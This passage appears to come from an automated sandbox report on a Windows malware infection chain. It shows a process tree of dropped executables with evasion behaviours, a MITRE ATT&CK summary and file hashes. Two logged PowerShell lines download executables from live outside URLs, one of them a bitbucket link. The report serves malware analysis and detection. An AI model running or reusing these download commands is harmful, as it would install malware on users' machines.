                                          • C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe
                                            C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe
                                            4⤵
                                            • Executes dropped EXE
                                            PID:5112
                                        • C:\Users\Admin\AppData\Local\Temp\a\random.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\random.exe"
                                          3⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Identifies Wine through registry keys
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • System Location Discovery: System Language Discovery
                                          PID:1524
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1524 -s 1472
                                            4⤵
                                            • Program crash
                                            PID:5288
                                        • C:\Users\Admin\AppData\Local\Temp\a\unik.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\unik.exe"
                                          3⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Identifies Wine through registry keys
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • System Location Discovery: System Language Discovery
                                          PID:4844
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4844 -s 1476
                                            4⤵
                                            • Program crash
                                            PID:6488
                                        • C:\Users\Admin\AppData\Local\Temp\a\xblkpfZ8Y4.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\xblkpfZ8Y4.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Suspicious use of FindShellTrayWindow
                                          PID:4832
                                        • C:\Users\Admin\AppData\Local\Temp\a\test28.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\test28.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          PID:3616
                                        • C:\Users\Admin\AppData\Local\Temp\a\test26.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\test26.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          PID:2204
                                        • C:\Users\Admin\AppData\Local\Temp\a\test27.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\test27.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          PID:4128
                                        • C:\Users\Admin\AppData\Local\Temp\a\test29.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\test29.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          PID:2028
                                        • C:\Users\Admin\AppData\Local\Temp\a\test25.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\test25.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          PID:4256
                                        • C:\Users\Admin\AppData\Local\Temp\a\test24.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\test24.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          PID:4508
                                        • C:\Users\Admin\AppData\Local\Temp\a\tik-tok-1.0.5.0-installer_iPXA-F1.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\tik-tok-1.0.5.0-installer_iPXA-F1.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of SetWindowsHookEx
                                          PID:2420
                                        • C:\Users\Admin\AppData\Local\Temp\a\main_v4.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\main_v4.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • System Location Discovery: System Language Discovery
                                          PID:5528
                                          • C:\Windows\SysWOW64\tasklist.exe
                                            tasklist
                                            4⤵
                                            • Enumerates processes with tasklist
                                            • System Location Discovery: System Language Discovery
                                            PID:6480
                                        • C:\Users\Admin\AppData\Local\Temp\a\TikTok18.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\TikTok18.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • System Location Discovery: System Language Discovery
                                          PID:4688
                                          • C:\Users\Admin\AppData\Local\Temp\e596289\TikTok18.exe
                                            run=1 shortcut="C:\Users\Admin\AppData\Local\Temp\a\TikTok18.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            PID:5784
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c .\TikTok18.bat
                                              5⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:5640
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/1/downloads/papa_hr_build.exe', 'C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe')";
                                                6⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                PID:1156
                                        • C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          • System Location Discovery: System Language Discovery
                                          PID:6884
                                          • C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe
                                            "C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            PID:1580
                                          • C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe
                                            "C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            PID:5208
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5208 -s 1304
                                              5⤵
                                              • Program crash
                                              PID:6660
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5208 -s 1268
                                              5⤵
                                              • Program crash
                                              PID:7056
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 312
                                            4⤵
                                            • Program crash
                                            PID:5272
                                        • C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          PID:5540
                                        • C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe"
                                          3⤵
                                            PID:5952
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -Command "Invoke-WebRequest -Uri "https://ratsinthehole.com/vvvv/yVdlbFlx" -OutFile "C:\Users\Public\Guard.exe""
                                              4⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              PID:6052
                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                          2⤵
                                            PID:1028
                                        • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                          "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                          1⤵
                                            PID:3068
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 6884 -ip 6884
                                            1⤵
                                              PID:6400
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5208 -ip 5208
                                              1⤵
                                                PID:5676
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5208 -ip 5208
                                                1⤵
                                                  PID:6576
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1524 -ip 1524
                                                  1⤵
                                                    PID:6916
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4844 -ip 4844
                                                    1⤵
                                                      PID:5056

                                                    Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Reconnaissance

                                                    Resource Development

                                                    Initial Access

                                                    Execution

                                                    Command and Scripting Interpreter

                                                    1
                                                    T1059

                                                    PowerShell

                                                    1
                                                    T1059.001

                                                    Scheduled Task/Job

                                                    1
                                                    T1053

                                                    Scheduled Task

                                                    1
                                                    T1053.005

                                                    Persistence

                                                    Modify Authentication Process

                                                    1
                                                    T1556

                                                    Scheduled Task/Job

                                                    1
                                                    T1053

                                                    Scheduled Task

                                                    1
                                                    T1053.005

                                                    Privilege Escalation

                                                    Scheduled Task/Job

                                                    1
                                                    T1053

                                                    Scheduled Task

                                                    1
                                                    T1053.005

                                                    Defense Evasion

                                                    Hide Artifacts

                                                    1
                                                    T1564

                                                    Hidden Files and Directories

                                                    1
                                                    T1564.001

                                                    Modify Authentication Process

                                                    1
                                                    T1556

                                                    Virtualization/Sandbox Evasion

                                                    4
                                                    T1497

                                                    Credential Access

                                                    Credentials from Password Stores

                                                    1
                                                    T1555

                                                    Credentials from Web Browsers

                                                    1
                                                    T1555.003

                                                    Modify Authentication Process

                                                    1
                                                    T1556

                                                    Steal Web Session Cookie

                                                    1
                                                    T1539

                                                    Unsecured Credentials

                                                    4
                                                    T1552

                                                    Credentials In Files

                                                    4
                                                    T1552.001

                                                    Discovery

                                                    Browser Information Discovery

                                                    1
                                                    T1217

                                                    Peripheral Device Discovery

                                                    2
                                                    T1120

                                                    Process Discovery

                                                    1
                                                    T1057

                                                    Query Registry

                                                    11
                                                    T1012

                                                    Remote System Discovery

                                                    1
                                                    T1018

                                                    System Information Discovery

                                                    7
                                                    T1082

                                                    System Location Discovery

                                                    1
                                                    T1614

                                                    System Language Discovery

                                                    1
                                                    T1614.001

                                                    System Network Configuration Discovery

                                                    1
                                                    T1016

                                                    Internet Connection Discovery

                                                    1
                                                    T1016.001

                                                    Virtualization/Sandbox Evasion

                                                    4
                                                    T1497

                                                    Lateral Movement

                                                    Collection

                                                    Data from Local System

                                                    3
                                                    T1005

                                                    Email Collection

                                                    1
                                                    T1114

                                                    Command and Control

                                                    Web Service

                                                    1
                                                    T1102

                                                    Exfiltration

                                                    Impact

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\ProgramData\DGHJECAFIDAF\GCBFBGCGI
                                                      Filesize

                                                      40KB

                                                      MD5

                                                      a182561a527f929489bf4b8f74f65cd7

                                                      SHA1

                                                      8cd6866594759711ea1836e86a5b7ca64ee8911f

                                                      SHA256

                                                      42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

                                                      SHA512

                                                      9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
                                                      Filesize

                                                      2B

                                                      MD5

                                                      d751713988987e9331980363e24189ce

                                                      SHA1

                                                      97d170e1550eee4afc0af065b78cda302a97674c

                                                      SHA256

                                                      4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                      SHA512

                                                      b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                      Filesize

                                                      2KB

                                                      MD5

                                                      627073ee3ca9676911bee35548eff2b8

                                                      SHA1

                                                      4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                                      SHA256

                                                      85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                                      SHA512

                                                      3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                      Filesize

                                                      152B

                                                      MD5

                                                      7bed1eca5620a49f52232fd55246d09a

                                                      SHA1

                                                      e429d9d401099a1917a6fb31ab2cf65fcee22030

                                                      SHA256

                                                      49c484f08c5e22ee6bec6d23681b26b0426ee37b54020f823a2908ab7d0d805e

                                                      SHA512

                                                      afc8f0b5b95d593f863ad32186d1af4ca333710bcfba86416800e79528616e7b15f8813a20c2cfa9d13688c151bf8c85db454a9eb5c956d6e49db84b4b222ee8

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                      Filesize

                                                      152B

                                                      MD5

                                                      5431d6602455a6db6e087223dd47f600

                                                      SHA1

                                                      27255756dfecd4e0afe4f1185e7708a3d07dea6e

                                                      SHA256

                                                      7502d9453168c86631fb40ec90567bf80404615d387afc7ec2beb7a075bcc763

                                                      SHA512

                                                      868f6dcf32ef80459f3ea122b0d2c79191193b5885c86934a97bfec7e64250e10c23e4d00f34c6c2387a04a15f3f266af96e571bbe37077fb374d6d30f35b829

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                      Filesize

                                                      5KB

                                                      MD5

                                                      0c7824b7496fb368bdf678b6234abd01

                                                      SHA1

                                                      2e4d38690569e601c16883bd31bae5559281e45e

                                                      SHA256

                                                      978c48212f01410f6e9d9f09c204a9298674f8c28fadde67c50bbda42d3a2740

                                                      SHA512

                                                      6feb59727ca578e886a309943575dd137ae563a418f857d02fda67dfef1e0e9568f4d7dabfc4fa9e54d7b14464e0cb919d356302a5b4c1c1fae242c9f059e0a2

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DT8WFI9F\soft[2]
                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      a8cf5621811f7fac55cfe8cb3fa6b9f6

                                                      SHA1

                                                      121356839e8138a03141f5f5856936a85bd2a474

                                                      SHA256

                                                      614a0362ab87cee48d0935b5bb957d539be1d94c6fdeb3fe42fac4fbe182c10c

                                                      SHA512

                                                      4479d951435f222ca7306774002f030972c9f1715d6aaf512fca9420dd79cb6d08240f80129f213851773290254be34f0ff63c7b1f4d554a7db5f84b69e84bdd

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\TXFXF28K\download[1].htm
                                                      Filesize

                                                      1B

                                                      MD5

                                                      cfcd208495d565ef66e7dff9f98764da

                                                      SHA1

                                                      b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                      SHA256

                                                      5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                      SHA512

                                                      31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                      Filesize

                                                      948B

                                                      MD5

                                                      441a842138038e6385e430a90d7ea608

                                                      SHA1

                                                      7b3712d2cdd37e10ee9b3994131ee5175e920f01

                                                      SHA256

                                                      47592f3324179912d3bdba336b9e75568c2c5f1a9fb37c1ba9f0db9df822164c

                                                      SHA512

                                                      9dbddc3216f2a132ae3961b3aeac2c5b8828dcc9292f6c5bf1171c47453aa8687f92658818d771413492c0ea565e9ede17b9c03e427af9dc2ac21a78369a6666

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                      Filesize

                                                      1KB

                                                      MD5

                                                      7332074ae2b01262736b6fbd9e100dac

                                                      SHA1

                                                      22f992165065107cc9417fa4117240d84414a13c

                                                      SHA256

                                                      baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa

                                                      SHA512

                                                      4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                      Filesize

                                                      1KB

                                                      MD5

                                                      f6f33ae41ff18891871a3e906d915eb4

                                                      SHA1

                                                      cf6ac704047ea22e450c3fa972d98111e43885bc

                                                      SHA256

                                                      0225284153c04eb74129e1fbd81e498496e4ac83a70e9f40944c72a9012e2c45

                                                      SHA512

                                                      799bf60838820fd51d2247317ea2e7c2dfe08dadcd9659e7d4d0ac0b944c6ef17916aedf99be1e09bf4c608610cd4c58ddedb455af4a5117dfda95ea66540840

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                      Filesize

                                                      944B

                                                      MD5

                                                      e3840d9bcedfe7017e49ee5d05bd1c46

                                                      SHA1

                                                      272620fb2605bd196df471d62db4b2d280a363c6

                                                      SHA256

                                                      3ac83e70415b9701ee71a4560232d7998e00c3db020fde669eb01b8821d2746f

                                                      SHA512

                                                      76adc88ab3930acc6b8b7668e2de797b8c00edcfc41660ee4485259c72a8adf162db62c2621ead5a9950f12bfe8a76ccab79d02fda11860afb0e217812cac376

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cjdhqiru.vi0.ps1
                                                      Filesize

                                                      60B

                                                      MD5

                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                      SHA1

                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                      SHA256

                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                      SHA512

                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Temp\a\02.08.2022.exe
                                                      Filesize

                                                      234KB

                                                      MD5

                                                      718d9132e5472578611c8a24939d152d

                                                      SHA1

                                                      8f17a1619a16ffbbc8d57942bd6c96b4045e7d68

                                                      SHA256

                                                      09810b0365c5ac275cca1a45ea00b00fdca819b7f10ce2c8a6a50a456d9e1ced

                                                      SHA512

                                                      6ae73ad6156bafa2e3f9a2b3466bca4d0a38d562b40aa29a84b6c9fe9380d2f99d73235b5d70208d6f2a3f607710eebf8c4daed6d387add0d933933fdd8c05de

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe
                                                      Filesize

                                                      1.0MB

                                                      MD5

                                                      73507ed37d9fa2b2468f2a7077d6c682

                                                      SHA1

                                                      f4704970cedac462951aaf7cd11060885764fe21

                                                      SHA256

                                                      c33e3295dcb32888d000a2998628e82fd5b6d5ee3d7205ea246ac6357aa2bea6

                                                      SHA512

                                                      3a1031ce2daf62a054f41d226e9c9a0144ce746130db68737aaaa7930b148cbfbb99476c05504d6ebd4911f4e567ec1399005be7e64583caa636d7d94f5cd369

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Temp\a\Loader.exe
                                                      Filesize

                                                      63KB

                                                      MD5

                                                      56c640c4191b4b95ba344032afd14e77

                                                      SHA1

                                                      c93a0fd32b46718ca3bc7d1c78ae6236b88ef3c9

                                                      SHA256

                                                      ebd4b1ab90350e2f13d46f2a356d5a637d5bec704cf3af211c43a89cb11dd142

                                                      SHA512

                                                      617512f96443b7cc9cc315d2eb0322d8b359218d459e80821563336b67ac263f1da9b00c75bde73320d6540572552c47b436c683c862f19b5ed470273001e63e

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe
                                                      Filesize

                                                      409KB

                                                      MD5

                                                      2d79aec368236c7741a6904e9adff58f

                                                      SHA1

                                                      c0b6133df7148de54f876473ba1c64cb630108c1

                                                      SHA256

                                                      b33f25c28bf15a787d41472717270301071af4f10ec93fa064c96e1a33455c35

                                                      SHA512

                                                      022c5d135f66bc253a25086a2e9070a1ae395bdedd657a7a5554563dace75e1cbfe77c87033d6908d72deeab4a53f50e8bd202c4f6d6a9f17a19a9ebfdfe9538

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Temp\a\TikTok18.exe
                                                      Filesize

                                                      2.4MB

                                                      MD5

                                                      70a396a9f154f9a70534b6608e92cb12

                                                      SHA1

                                                      1a4c735936c372df4f99a3ff3a024646d16a9f75

                                                      SHA256

                                                      51638445d940ee396b2d963473fa473840459920f0201a765ccb8cf8869741d5

                                                      SHA512

                                                      72322ef6c4ee7c278dccd755a487463e09e34551a2fd3f1fe7ba1bc216e275e7e17f36dbcf4f48b48875f416affc41bf9d2617fbd7fde759f265e7bdd55cc203

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Temp\a\Tutorial.exe
                                                      Filesize

                                                      7KB

                                                      MD5

                                                      07edde1f91911ca79eb6088a5745576d

                                                      SHA1

                                                      00bf2ae194929c4276ca367ef6eca93afba0e917

                                                      SHA256

                                                      755d0128ec5a265f8fe25fa220925c42171682801aa0160707ffc39719270936

                                                      SHA512

                                                      8ed0362290199a6e5b45dc09061a06112eae9a68bea11241a31e330be5ca83a5936f64e1139c33159c91e87320a20904891b3e48802626b809d6b37001c425e7

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Temp\a\Winsvc.exe
                                                      Filesize

                                                      2.1MB

                                                      MD5

                                                      169a647d79cf1b25db151feb8d470fc7

                                                      SHA1

                                                      86ee9ba772982c039b070862d6583bcfed764b2c

                                                      SHA256

                                                      e61431610df015f48ebc4f4bc0492c4012b34d63b2f474badf6085c9dbc7f708

                                                      SHA512

                                                      efb5fd3e37da05611be570fb87929af73e7f16639b5eb23140381434dc974afc6a69f338c75ede069b387015e302c5106bf3a8f2727bb0406e7ca1de3d48a925

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Temp\a\aa.exe
                                                      Filesize

                                                      74KB

                                                      MD5

                                                      447523b766e4c76092414a6b42080308

                                                      SHA1

                                                      f4218ea7e227bde410f5cbd6b26efd637fc35886

                                                      SHA256

                                                      3e7eb033eaf54c89f14d322597e377be7fd69f9c300f5be0e670b675d2a1a568

                                                      SHA512

                                                      98b68c743d8aab5b9cb0aad2331ab24673e425fbe68ad0ede2f3aafc1394879f8a05c7db5393b3ef3b8c2d21674a35f90c275558f43cdf983d03d995151ec2f9

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Temp\a\aidans.dont.run.exe
                                                      Filesize

                                                      63KB

                                                      MD5

                                                      9efaf6b98fdde9df4532d1236b60619f

                                                      SHA1

                                                      5d1414d09d54de16b04cd0cd05ccfc0692588fd1

                                                      SHA256

                                                      7c8a5e6cf4e451d61157e113f431a1f3e606fba0e7147ffa9a8f429cb60e47d6

                                                      SHA512

                                                      eabc2c58a7b2d636f13b149199f2dc943c4af3296c5a4605b72293294a449a2ea8da432238748ca2fb69fb944a31ac6fae7e5310cdc57609e5955f62b71e812d

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Temp\a\ataturk.exe
                                                      Filesize

                                                      56KB

                                                      MD5

                                                      a7b36da8acc804d5dd40f9500277fea9

                                                      SHA1

                                                      5c80776335618c4ad99d1796f72ebeb53a12a40b

                                                      SHA256

                                                      b820302d0d553406ab7b2db246c15ac87cb62a8e9c088bda2261fe5906fc3672

                                                      SHA512

                                                      ee1a8b3fdc049f90c0a4cfe166a7bde04eb6c55a261ad9f9574c995ea782b9e2398ac7028a258ea737aea81326fa3f85e609f3e1510373b9925dc03dcb0dee52

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe
                                                      Filesize

                                                      254KB

                                                      MD5

                                                      892d97db961fa0d6481aa27c21e86a69

                                                      SHA1

                                                      1f5b0f6c77f5f7815421444acf2bdd456da67403

                                                      SHA256

                                                      c4b11faff0239bc2d192ff6e90adec2684124336e37c617c4118e7e3bc338719

                                                      SHA512

                                                      7fe31101f027f2352dea44b3ba4280e75a4359b6a822d813f9c50c0d6ef319b7c345280786c1bc794b45fbd4fa87939a79cc15b82fc7959ccce1b732f33ba241

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe
                                                      Filesize

                                                      320KB

                                                      MD5

                                                      3050c0cddc68a35f296ba436c4726db4

                                                      SHA1

                                                      199706ee121c23702f2e7e41827be3e58d1605ea

                                                      SHA256

                                                      6bcddc15bc817e1eff29027edc4b19ef38c78b53d01fb8ffc024ad4df57b55c2

                                                      SHA512

                                                      b95c673a0c267e3ba56ffa26c976c7c0c0a1cc61f3c25f7fc5041919957ad5cb3dfe12d2a7cc0a10b2db41f7e0b42677b8e926d7b4d8679aadbd16976bd8e3ca

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Temp\a\handeltest.exe
                                                      Filesize

                                                      8KB

                                                      MD5

                                                      fc58aae64a21beb97e1f8eb000610801

                                                      SHA1

                                                      d377b4da7d8992b0c00455b88550515369b48c78

                                                      SHA256

                                                      a9da5745b96d84d4933b62dd790563ecdf59b5cf45009a192e886dc39c80c389

                                                      SHA512

                                                      601d661020e204565d21a1b7cedc5c081be2a88c226cd7152be6d3ea0ccc72161dcec68026f344028e5409e08178877639d5d6a46564d8e3d68236e484fc03d8

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Temp\a\main_v4.exe
                                                      Filesize

                                                      9.3MB

                                                      MD5

                                                      b248e08a7a52224f0d74d4a234650c5b

                                                      SHA1

                                                      6218a3c60050b91ad99d07eb378d8027e8e52749

                                                      SHA256

                                                      746454b0fce64c3b29b5279e2ca7c6c68a41b9b5f0cce71449f9fffe0be9cce1

                                                      SHA512

                                                      5ef1bd0c480e635aafa517b57d5bc8dbf577c54dfac9a7887d67761e3017b6a90f5607ced3717c61db9e44833500295e978c88c64d268725aa55230e83c470a8

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Temp\a\nobody.exe
                                                      Filesize

                                                      74KB

                                                      MD5

                                                      4b1b45bb55ccdd4b078459ade3763e6d

                                                      SHA1

                                                      049344853c902e22e70ae231c669bf0751185716

                                                      SHA256

                                                      1f06ff3d8f50e6c184beca758aaad63936ad20a056b8ae4c8138d85ccc703a46

                                                      SHA512

                                                      b95739746df825e83e59b81f11f841d6029f92bebcd46485df456b23ff1c87cbce097d1e695a9f0a2559bcd9960a4f4fc137bca95233fafe95b13ddf5fabad65

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Temp\a\output.exe
                                                      Filesize

                                                      41KB

                                                      MD5

                                                      a0e598ec98a975405420be1aadaa3c2a

                                                      SHA1

                                                      d861788839cfb78b5203686334c1104165ea0937

                                                      SHA256

                                                      e6ac8a6dac77f9873024f50befb293b9cf6347aa2e093cd863b551d9c8da5f8d

                                                      SHA512

                                                      e5ee500a8dcddd72e727cfa24e51093cd2b088f7ef89089f1d24145baa41c1ac46bf6be73bfd8cb15e2549349da8c2547d4e391b6e3a456621524fe0f83f9585

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe
                                                      Filesize

                                                      2.7MB

                                                      MD5

                                                      3d2c8474cf29654480a737b1af11edee

                                                      SHA1

                                                      763fb3cfdea60a2f4a37392727e66bdacc1b7c61

                                                      SHA256

                                                      b2c77896de8b7c5a3041017f03c47c10032162a85e4299ffa7ad7545be058da2

                                                      SHA512

                                                      707d1aac77fb95beb0108a27bbe8fa5cff1ae6b81aa6899dfd91d03243540ee18df95731ce91231ae9a78c21dc5913d91238a2ff5f1391bf002edde6d322645b

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Temp\a\random.exe
                                                      Filesize

                                                      1.9MB

                                                      MD5

                                                      50a2b1ed762a07b62770d1532a5c0e57

                                                      SHA1

                                                      3e89b640f5bc1cfd6da2dded0f6aea947a7f6353

                                                      SHA256

                                                      859fca2ff16a4c2e55accf995c415e046c4d4150fb3b50064ee26acbb02cb853

                                                      SHA512

                                                      207ad9f0a03fbb9bd58087fb49bd84c71493e4e840a367b0732b8dc836184845c4c0b9f873a9c068ca3295786a283d2bd936aa01cc87e9a3f1e26e2cfcabf7ca

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Temp\a\saloader.exe
                                                      Filesize

                                                      229KB

                                                      MD5

                                                      1e10af7811808fc24065f18535cf1220

                                                      SHA1

                                                      65995bcb862aa66988e1bb0dbff75dcac9b400c7

                                                      SHA256

                                                      e07fd0ac793b06603be164c9ee73465af512cf17bed07614cbcd2a8410f04eed

                                                      SHA512

                                                      f1c623918a3701254805e7648d671b316446a0f98637d3de62d44331cf91502afb57ccb762472491bc4ac037fbf5f7b624eb9d39092b3be0b2ed84da6f3acadc

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Temp\a\start.exe
                                                      Filesize

                                                      45KB

                                                      MD5

                                                      b733e729705bf66c1e5c66d97e247701

                                                      SHA1

                                                      25eec814abdf1fc6afe621e16aa89c4eb42616b9

                                                      SHA256

                                                      9081f9cf986ed111d976a07ee26fc2b1b9992301344197d6d3f83fe0d2616023

                                                      SHA512

                                                      09b59b8942c1409a03ca4e7f77c6007160af4d557386b766516dba392750869c017d0fd5d6fbbfcbb3e559a70ad42adcb498595df186be180cfc04e921d74320

                                                      Download Submit

                                                    • C:\Users\Admin\AppData\Local\Temp\a\test24.exe
                                                      Filesize

                                                      354KB

                                                      MD5

                                                      6afc3c2a816aed290389257f6baedfe2

                                                      SHA1

                                                      7a6882ad4753745201e57efd526d73092e3f09ca

                                                      SHA256

